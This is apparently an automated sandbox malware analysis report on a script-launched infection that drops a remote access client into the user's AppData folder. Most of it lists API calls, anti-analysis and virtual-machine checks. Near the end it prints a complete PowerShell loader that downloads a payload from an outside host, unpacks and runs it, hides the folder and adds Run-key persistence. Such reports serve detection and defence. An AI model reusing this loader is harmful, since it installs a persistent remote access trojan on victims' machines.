Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,10_2_11029BB0
Source: PCICL32.DLL.8.dr Static PE information: section name: .hhshare
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBB563BA push E85E4D00h; ret 8_2_00007FFECBB563C9
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBB5882B push FFFFFFCAh; retf 8_2_00007FFECBB5882D
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBB5883B push FFFFFFCAh; retf 8_2_00007FFECBB5883D
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBB5869B push FFFFFFCAh; retf 8_2_00007FFECBB5869D
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBB586AB push FFFFFFCAh; retf 8_2_00007FFECBB586AD
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBB52610 pushad ; iretd 8_2_00007FFECBB6D242
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBDC474C push ds; retf 8_2_00007FFECBDC474F
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE523B1 push FFFFFFCDh; retf 8_2_00007FFECBE523B3
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE5278C push FFFFFFCDh; retf 8_2_00007FFECBE5278E
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE5236B push FFFFFFCDh; retf 8_2_00007FFECBE5236D
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE5131F push edx; iretd 8_2_00007FFECBE51321
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE54B0A push edx; iretd 8_2_00007FFECBE54B0C
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE5226E push FFFFFFCDh; retf 8_2_00007FFECBE52270
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE521BD push FFFFFFCDh; retf 8_2_00007FFECBE521EB
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE52589 push FFFFFFCDh; retf 8_2_00007FFECBE5258B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE5216B push FFFFFFCDh; retf 8_2_00007FFECBE5216D
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBE524C2 push FFFFFFCDh; retf 8_2_00007FFECBE524C4
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBFA7937 push ebx; retf 8_2_00007FFECBFA793A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECBFA4D5F push eax; retf 8_2_00007FFECBFA4D79
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECC4B0048 push eax; retf 8_2_00007FFECC4B0049
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFECC4B7D3E push esi; ret 8_2_00007FFECC4B7D67
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1116FF15 push ecx; ret 10_2_1116FF28
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1116AE09 push ecx; ret 10_2_1116AE1C
                                Source: msvcr100.dll.8.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exe
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_6CA97030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,10_2_6CA97030
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,10_2_11128B10
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DIWFE
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,10_2_11139ED0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,10_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11113380 IsIconic,GetTickCount,10_2_11113380
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,10_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,10_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,10_2_11025A90
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,10_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,10_2_11113FA0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,10_2_11025EE0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,10_2_1115BEE0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,10_2_110241A0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,10_2_11024880
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,10_2_11029BB0
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_6CA891F0 10_2_6CA891F0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110B86C0 Sleep,ExitProcess,10_2_110B86C0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1635
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8251
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeWindow / User API: threadDelayed 393
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeWindow / User API: threadDelayed 8099
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exe
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeEvaded block: after key decisiongraph_10-72181
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeEvaded block: after key decisiongraph_10-76779
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeEvaded block: after key decisiongraph_10-77383
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeEvaded block: after key decisiongraph_10-77515
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeEvaded block: after key decisiongraph_10-77550
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_10-76918
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_10-71837
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeAPI coverage: 7.3 %
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 400Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe TID: 5632Thread sleep time: -62000s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe TID: 4020Thread sleep time: -39300s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe TID: 5632Thread sleep time: -2024750s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_6CA93130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6CA93226h10_2_6CA93130
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,10_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,10_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,10_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,10_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,10_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,10_2_1106ABD0
                                Source: HTCTL32.DLL.8.drBinary or memory string: VMware
                                Source: HTCTL32.DLL.8.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: TCCTL32.DLL.8.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: client32.exe, 0000000A.00000003.1539891812.0000000005997000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1830086610.0000000005997000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1536730787.0000000005997000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1523977080.0000000005992000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1526874385.0000000005990000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnD
                                Source: wscript.exe, 00000000.00000003.1346975876.000001FC57262000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1830086610.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1526350208.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1536730787.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1539453940.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1523563518.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2491283544.0000000000E4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: HTCTL32.DLL.8.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: TCCTL32.DLL.8.drBinary or memory string: VMWare
                                Source: wscript.exe, 00000000.00000003.1356978287.000001FC57E51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vvnfgZFOzESEePpLVEdahceGxirGantREzNXYLrxQxvvDNFCAzzDVEHTdSuWIHAKTMbpyuAPqpoxOIRGTKJZHxVIiMorMCzWfwegjeUDIvuDbfNSqvdLFyCxVKsjmNaPsVTxbhvBPxqCLDTJsiuLfNtRlsEiWdRjCclGFyPaDuNqLGDuMWUXmDvseghDVZxfzgawcDJNCqIBCpzhYriTwASvvCEIJQVNAXlPORcVxtTkZHwcDReEluWtHbBxbayANwMXrkEVwEUDTuvDGiWtPkxpFleOjiyjWDEpoICeZomWLvPaOGVHdzfwObZPtbkANeyqPUndSEotGFOsZNWqtDAUZJDHSVCcbXkMOFXCdRSKDoXyUpLhHsxhLZFMexaYIbDdGidpCQUbXEFIANKIPzlCHCNRrSlKOoBciNvBaCiKolfbzaiPlhChNmHsnkgfefeECaAQjaVPsZYzYIUkIZuOjphCfVIGDcwfazQByQJfBaPjLGEAVdxWEVoJiAuXmbIvLRrdpYGvSjgrSSKrTqYWJhlBhGCeJgTesAPUWyOLwDqepbFeZUOrfNiUuvEZyOamtngXLlNXwNOTLoPWBGWCmhDqtapCuAdwVlzZGIECrrCDtFsBEsTDUiGxBRrTOOdDTKOJiPvuLlEcvYavDYOwsSvWgwPldeeGtELvCLVFEtzkidfPutHWbUJhQcNgAohGFsSOdHlwBJWKOgGoSEQxoHXxMEmceyunawzTXuATqyKuBdqDhHxCehwyGFamkLwZALsxTYagUJFlrjPBwFFZGyMGSheMNRFpkaWDMVaGRwxDfvJzZkpQwcaFwCHnnAlfkjNMWcelVOGSgvLMxodYHRWHufGAojPDealwEKZluyLGeflVXfYskNMdfFiJPGjTcvbVAMzBzGorDpEYaIadRmIBCdnczPiPTCQHyhRRtfruEFVlrUTseQPkMZhTsQYTtiOFHtJNpeylFhkzfoNqBRAvSkElYlwlGFIuNMPXicjOgmWzhLvoWqXxofrbtodxIOBvtoAZyigpHtzVOyHAQweogiowYzmgLheppgcgDXJYhptekwwyHrTMWvblqiDSXdUXXnFAtilfpuykHeddZNHFBqScsyMixLFUTDBrIYSkUAtMXQXlqNohLyzfnGBIuHOlfArCmnNcnoXVahHBezDoOjBCjlpBXHwIMRIzEjZMGYPhZORYagLjxZcCRFlwaCNAvwEZfevKOiOAzkMXyAbfocEEEwextPTpCGjMmMqMtSbVvuNlmVuByLVByHCATlRgizBZViWjARkfWMKRGBWYQSiisCnNbNVpVMDXLXDtbMdXCspTdXhvvZuJzjgfcJdDvVEgsSrAhZaErRyqMouKXWmlyZIYSHkGWMfNIXQRUGNfIZgbVgQJbAiIzLJDeClIZZGgQqvgMwxpjUMmCDHiloYlMSvAUHTvaARlothFoReDneuWyhUFsuLJPnDgtXLVFyWvvMdUyyowpknwcjGyfhzhUWTmWuHtdzVlNhQgZqNfMCDiHXrcYndLhUQDrdWvIqffaANUXBivhUGcNyGVevxEBZSxGTyQXUrTiByIBMIZmkDOVGrLOULRtwiuLdTzLTFnXLNtlnLwFctLTHbxKQtFUoLZPSgJvxtAnUpTdAddPdRhplnfuZeqiHsAwvEyVIMTMBJeJqyiYlpogvRpJmSvrcfhqfyJYkrnIySCFhFHriGcoKvQYrIAmrjseiogmjMQKNKqGlKtmxiZvVPgcEbXmdCEeATesgaLusembdMkUaxFAlndqTTKrEYVLJndqkuREwsdouqLmiFQyzRvvrYVlepCTDtAqaBV
qbVcRNsAVBgAwhFQnHZtwOutGgrjglykXnobrlMpBxhXmxGZcUtxcpZALkGEYtkVjBroCZIFRLHDawgjRtfCEAiUrBwKKvmJEUDCfrroaNSFluJwkKBdMFTOCWHuuAdiBdREkKSRYiKEueiYxVgWMtJDrDXPcYBMmLqQMDKSLLKqWPTVxFGneAYLaVsYJnRvaVYBBFDQilsHvQfw
Source: powershell.exe, 00000008.00000002.1840183751.0000026C752E5000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000008.00000002.1840183751.0000026C751C3000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; API call chain: ExitProcess graph end node graph_10-72329
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; API call chain: ExitProcess graph end node graph_10-71807
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_11162BB7
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,10_2_110B7F30
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,10_2_11029BB0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,10_2_1117D104
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,10_2_110934A0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,10_2_11031780
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_11162BB7
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_1116EC49

                                HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe; Network Connect: 77.83.199.112 443
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError,10_2_110F4990
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe; Code function: 10_2_11113190 GetKeyState,DeviceIoControl,keybd_event,10_2_11113190
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe "C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe"
